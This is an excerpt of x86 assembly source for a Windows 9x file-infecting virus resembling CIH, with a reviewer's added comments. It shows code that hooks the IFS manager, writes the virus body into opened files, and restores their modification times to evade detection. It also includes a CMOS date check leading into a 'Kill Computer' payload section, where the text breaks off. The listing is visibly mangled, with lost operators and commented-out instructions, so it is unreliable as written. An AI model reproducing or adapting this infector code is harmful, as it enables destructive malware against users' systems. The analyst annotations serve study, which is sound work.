; * to File, I Must Restore * ; * them First. ^__^ * ; ***************************
; NOTE(review): this page is a whitespace-mangled paste. The '+' operators inside
; operands (e.g. "[eax 2]", "(VxDCallIDTable (ecx-1)*04h-@9)") appear to have
; been lost in extraction; the instructions are kept exactly as found.
;
; Walk the VxDCall table backwards and rewrite each in-memory call site as the
; unlinked "int 20h" + dword service-ID stub (bytes CD 20 <id>) before the body
; is written to disk. (The in-memory form was presumably patched by the VxD
; loader's dynamic linking — TODO confirm against the table setup, outside this
; excerpt.)
;   eax = address of the current call site (starts at the last one)
;   ecx = entries remaining, counted down to 1
;   esi = delta base for the @9-relative addressing
        lea     eax, (LastVxDCallAddress-2-@9)[esi]
        mov     cl, VxDCallTableSize            ; only cl is written; assumes the upper bits of ecx are already 0 — TODO confirm in caller
LoopOfRestoreVxDCallID:
        mov     word ptr [eax], 20cdh           ; little-endian: bytes CD 20 = "int 20h"
        mov     edx, (VxDCallIDTable (ecx-1)*04h-@9)[esi]
        mov     [eax 2], edx                    ; service-ID dword follows the int 20h
        movzx   edx, byte ptr (VxDCallAddressTable ecx-1-@9)[esi]
        sub     eax, edx                        ; step back to the previous call site by its stored byte distance
        loop    LoopOfRestoreVxDCallID
; *************************** ; * Let's Write * ; * Virus Code to the File * ; ***************************
; Write the body to the already-opened target file, one chunk per loop pass.
; The per-chunk values were pushed onto the stack before this point (outside
; this excerpt); a zero first value ends the loop.
;   dr1   -> work structure; [eax] is called as IFSMgr_Ring0_FileIO, [eax 10h]
;            is loaded into ebx (file handle under the Ring0_FileIO convention,
;            if I recall it correctly — verify)
WriteVirusCodeToFile:
        mov     eax, dr1                        ; debug register DR1 is used as pointer storage
        mov     ebx, [eax 10h]                  ; presumably the file handle — layout not visible here
        mov     edi, [eax]                      ; IFSMgr_Ring0_FileIO entry, called via edi below
LoopOfWriteVirusCodeToFile:
        pop     ecx                             ; first value of the triple; zero = no more chunks
        jecxz   SetFileModificationMark
        mov     esi, ecx                        ; esi = buffer (Ring0_FileIO write: esi=buffer, edx=position, ecx=count — from memory, verify)
        mov     eax, 0d601h                     ; R0_WRITEFILE (IFS.H name, from memory — verify)
        pop     edx
        pop     ecx
        call    edi                             ; VXDCall IFSMgr_Ring0_FileIO
        jmp     LoopOfWriteVirusCodeToFile
; *************************** ; * Let's Set CF = 1 ==> * ; * Need to Restore File * ; * Modification Time * ; ***************************
; Reached when the write loop runs out of chunks. Marks "a file was written,
; its modification time must be put back" by setting CF and saving the flags
; across the CloseFile call that follows (popf there).
SetFileModificationMark:
        pop     ebx                             ; remaining pushed values — meaning not visible in this excerpt
        pop     eax
        stc                                     ; Enable CF(Carry Flag)
        pushf                                   ; preserve CF across CloseFile
; ************************************* ; * Close File * ; *************************************
; Close the file, then decide from the saved CF whether the original
; modification time has to be restored.
CloseFile:
        xor     eax, eax
        mov     ah, 0d7h                        ; eax = 0d700h — R0_CLOSEFILE (IFS.H name, from memory — verify)
        call    edi                             ; VXDCall IFSMgr_Ring0_FileIO
; Need to restore the file modification time? CF was pushed before CloseFile
; (stc/pushf at SetFileModificationMark on the infect path; other paths into
; CloseFile are outside this excerpt).
        popf
        pop     esi
        jnc     IsKillComputer                  ; CF clear: nothing written -> skip restore, go to the trigger-date check
; Restore File Modification Time. Analyst note: the written file keeps its
; original timestamp, so change detection that relies on modification time
; alone will miss it — compare sizes or hashes instead.
        mov     ebx, edi                        ; keep the Ring0_FileIO entry; edi is reused as an argument below
        mov     ax, 4303h                       ; writes ax only; SET_ATTRIB_MODIFY_DATETIME (IFS.H name, from memory — verify)
        mov     ecx, (FileModificationTime-@7)[esi]          ; low word(s) of the saved DOS date/time
        mov     edi, (FileModificationTime 2-@7)[esi]        ; high word(s); esi (popped above) is presumably the pathname pointer the call needs — confirm
        call    ebx                             ; VXDCall IFSMgr_Ring0_FileIO
; ************************************* ; * Disable OnBusy * ; *************************************
; Release the OnBusy byte (its set side and the check on hook entry are outside
; this excerpt; presumably a re-entrancy guard for the hook — confirm).
DisableOnBusy:
        dec     byte ptr (OnBusy-@7)[esi]       ; Disable OnBusy
; ************************************* ; * Call Previous FileSystemApiHook * ; *************************************
; Hand the request on to the previously installed FileSystemApiHook.
; NOTE(review): as pasted on this page, "jmp [eax]" sits after a ';' and is
; therefore a comment, which would make prevhook fall through into pIFSFunc.
; That is most likely an extraction artifact (the author's own comment says
; "Jump to prevhook"); kept as found — confirm against the original listing.
prevhook:
        popad
        mov     eax, dr0                        ; dr0 holds the address of the saved previous-hook pointer ; jmp [eax] ; Jump to prevhook
; ************************************* ; * Call the Function that the IFS * ; * Manager Would Normally Call to * ; * Implement this Particular I/O * ; * Request. * ; *************************************
; Call the function the IFS Manager would normally call for this request,
; then, for one request type, copy a field out of the returned pioreq.
; Stack picture assumed from the offsets used: [ebx] = pushad frame (20h),
; then return address (04h), then the hook arguments — TODO confirm.
pIFSFunc:
        mov     ebx, esp
        push    dword ptr [ebx 20h 04h 14h]     ; Push pioreq
        call    [ebx 20h 04h]                   ; Call pIFSFunc
        pop     ecx                             ; ecx = pioreq again ; mov [ebx 1ch], eax ; Modify EAX Value in Stack
; NOTE(review): the "mov [ebx 1ch], eax" above is a comment as found on this
; page; whether that is intentional or an extraction artifact is not visible here.
; After calling pIFSFunc, get some data from the returned pioreq — only when the
; hook's function-code argument is 24h (IFSFN_OPEN in the Win9x IFS headers, from
; memory — verify).
        cmp     dword ptr [ebx 20h 04h 04h], 00000024h
        jne     QuitMyVirusFileSystemHook
; Get the file modification date and time in DOS format (dword at pioreq+28h per
; the author's comment; the ioreq layout is not visible in this excerpt).
        mov     eax, [ecx 28h]
        mov     (FileModificationTime-@6)[esi], eax
; *************************** ; * Quit My Virus' * ; * IFSMgr_FileSystemHook * ; ***************************
; Return from the hook to the IFS Manager, restoring the registers saved by
; the pushad at hook entry (outside this excerpt).
QuitMyVirusFileSystemHook:
        popad
        ret
; ************************************* ; * Kill Computer !? ... *^_^* * ; *************************************
; Trigger-date check. Reads the day-of-month from the RTC/CMOS (index register
; 70h, data register 71h; index 07h = day of month, BCD) — raw port I/O, so this
; runs at ring 0. The payload that follows is outside this excerpt.
; NOTE(review): the author's comment says day 26, but the mask on this page is
; 01h (ZF is set only when the BCD day reads 01); kept as found — possibly an
; edited variant or a transcription error.
IsKillComputer:
        ; Get Now Day from BIOS CMOS
        mov     al, 07h
        out     70h, al
        in      al, 71h
        xor     al, 01h                         ; ??/26/????
IF DEBUG
        jmp     DisableOnBusy                   ; DEBUG builds never reach the payload
ELSE
        jnz     DisableOnBusy                   ; day does not match: release OnBusy and chain to the previous hook
ENDIF
; ************************************** ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill * ; * Kill Kill Kill Kill Kill Kill Kill *